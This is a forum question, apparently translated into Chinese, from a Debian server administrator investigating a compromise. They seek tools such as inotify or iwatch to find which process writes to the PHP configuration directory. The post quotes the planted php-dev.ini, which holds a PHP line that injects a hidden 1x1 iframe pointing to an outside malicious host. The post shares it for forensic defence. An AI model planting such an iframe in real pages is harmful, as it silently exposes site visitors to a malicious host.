我有一台运行 Debian Lenny 的服务器。最近我遇到了一些安全问题。我特别看到在 /etc/php5/conf.d 中创建了一个名为“php-dev.ini”的文件。乍一看,该文件看起来正常且无害,直到您打开它。它包含:
<?php print "<iframe src='http://google-traf.zyns.com/index.php?tp=4abd7c0637c89d7a' width='1' height='1' frameborder='0'></iframe>"; ?>
显然我知道服务器有安全问题,所以请不要说“你给服务器打补丁了吗?” 回应。那已经完成了。已检查服务器是否存在 rootkit,并且没有可疑帐户。我对什么用户或 PID 正在写入此目录特别感兴趣,并且正在寻找可以使用哪些工具来帮助我。我已经研究过“iwatch”和“inotify”,但想在我走上研究之路之前从其他人那里得到一些反馈。有谁知道一个可以帮助我识别的好工具:
基本上,我希望做一些取证并了解监视文件系统。任何见解将不胜感激。
(编辑以引用 PHP 代码示例,因为它之前未显示。)